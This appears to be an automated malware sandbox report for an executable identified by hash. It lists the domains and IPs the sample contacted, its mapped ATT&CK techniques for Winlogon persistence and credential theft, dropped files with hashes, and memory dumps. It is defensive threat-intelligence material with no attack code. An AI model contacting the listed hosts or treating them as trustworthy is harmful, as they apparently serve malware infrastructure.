0ae3c3d40e9e2f9a607eb122945fd806.exe

64 B
96 B
1
1

DNS Request

blenderartists.org

DNS Response

104.21.49.24

172.67.188.202
8.8.8.8:53

zonetf.com

dns

0ae3c3d40e9e2f9a607eb122945fd806.exe

56 B
72 B
1
1

DNS Request

zonetf.com

DNS Response

212.32.237.92
8.8.8.8:53

zonedg.com

dns

0ae3c3d40e9e2f9a607eb122945fd806.exe

112 B
72 B
2
1

DNS Request

zonedg.com

DNS Request

zonedg.com

DNS Response

206.238.216.8

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\3AA1.2DF

Filesize
300B

MD5
43d6ba7e91b5a95024e94a5d92ae3253

SHA1
46ba464d2694e865277b9b2d8d58b6a52e742ef9

SHA256
9e3a524c5cbda746de47b1bbf23d0a0dc17333a4417c4a8ff0f77efeb9cb8f32

SHA512
08f584c7130368905e97b5af2a3468e2b2eac6156f9fe47608d7748fb06505e82b3824b762a6bcebacafcf9f014c6f390d5b84a0d1f2d8b4424f41df53dacfb4

Download Submit
C:\Users\Admin\AppData\Roaming\3AA1.2DF

Filesize
1KB

MD5
360d074420a5f4ae3283e5cb833b8364

SHA1
57c5026ba03daef89440144b0a21a0fc044a53c9

SHA256
a952fbfb41148579acd22d27a079b159b7c2a022fd7ecf7186a6d53a78d1749f

SHA512
2271d17fe2d8b058e086fa9da65b6c776258ece8156678c234e0148aa9529c856cfb93d4dc648df100f7f45a7b1ba522a7fe56a140ee65acb04cb4f16eaea809

Download Submit
C:\Users\Admin\AppData\Roaming\3AA1.2DF

Filesize
696B

MD5
4124215bcd51189a2d667f1f3df4f5da

SHA1
9ce7c2dafa3b6a499f4625d7492d5e0e593d6c23

SHA256
6ab05e26fa32776e2c17959d3bfc6dfc3893a47e9e610ad501803e0624f7d82d

SHA512
730972d3346792d82d7022e391db07fa4b3e3803f5c235a920e3558e6a1d4aa0a6ced3a06b6d8f69a4dfd5dfae6bce8647e289ec948b9f0d64203d726e821875

Download Submit
memory/804-6-0x0000000000575000-0x0000000000598000-memory.dmp

Filesize
140KB

Download
memory/804-5-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2188-71-0x0000000000635000-0x0000000000658000-memory.dmp

Filesize
140KB

Download
memory/2188-70-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2320-1-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2320-73-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2320-72-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2320-64-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2320-2-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2320-162-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.